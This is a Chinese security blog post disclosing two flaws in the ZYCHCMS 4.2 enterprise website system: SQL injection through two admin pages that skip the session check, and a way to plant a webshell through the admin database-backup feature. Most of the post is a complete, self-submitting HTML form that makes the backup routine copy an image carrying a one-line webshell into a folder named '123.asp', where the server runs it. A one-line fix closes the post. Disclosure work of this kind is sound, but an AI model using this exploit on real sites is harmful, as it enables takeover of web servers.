您的位置 » 首页 » 实用工具 » ZYCHCMS企业网站管理系统4.2注射及后台拿webshell

ZYCHCMS企业网站管理系统4.2注射及后台拿webshell

发表于5年前 | 作者: seay | 分类: 实用工具 | 孵化于:2012年09月18日 | 文章热度:3,139 次 全屏阅读

显示不全请点击全屏阅读

①SQL注射漏洞
②后台拿WBSHELL
详细说明:
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
①SQL注射漏洞
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
漏洞原因:未过滤
漏洞代码:
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
②后台拿WBSHELL
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
这里在网上找了一个,改了下,将就着用。看效果如图2

以下是代码本地提交代码
<form method=”post” action=”http:// www.2cto.com /admin/Manage_backup.asp?action=Backup” name=add>

<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
<tr>
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
</tr>
<tr>
<td bgcolor=”#FFFFFF”><span>

</span>
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
<tr onmouseover=”style.backgroundColor=’#EEEEEE'” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
<td height=”25″ width=”30%”><div align=”left”>当前数据库路径</div></td>
<td width=”70%”>
<div align=”left”>
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />

<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
</div></td>
</tr>
<tr onmouseover=”style.backgroundColor=’#EEEEEE'” onmouseout=”style.backgroundColor=’#FFFFFF'” bgcolor=”#FFFFFF”>
<td height=”25″ width=”30%”><div align=”left”>备份数据库名称</div></td>
<td><div align=”left”>
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
</tr>
<tr onmouseover=”style.backgroundColor=’#EEEEEE'” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
<td height=”25″ width=”30%”><div align=”left”></div></td>
<td><div align=”left”>
<input type=”submit” value=”确定备份”/>
</div></td>
</tr>
</table></td></tr></form>
</table>
</td>
</tr>
</table>
<script>
document.all.add.submit();
</script>
漏洞证明:我用官方演示站点做测试,如图1

备份一句话

修复方案:
修复方法:在文件开头加入代码
<!–#include file=”seeion.asp”–>

Tags:

ZYCHCMS系统4.2注入漏洞,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/917/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)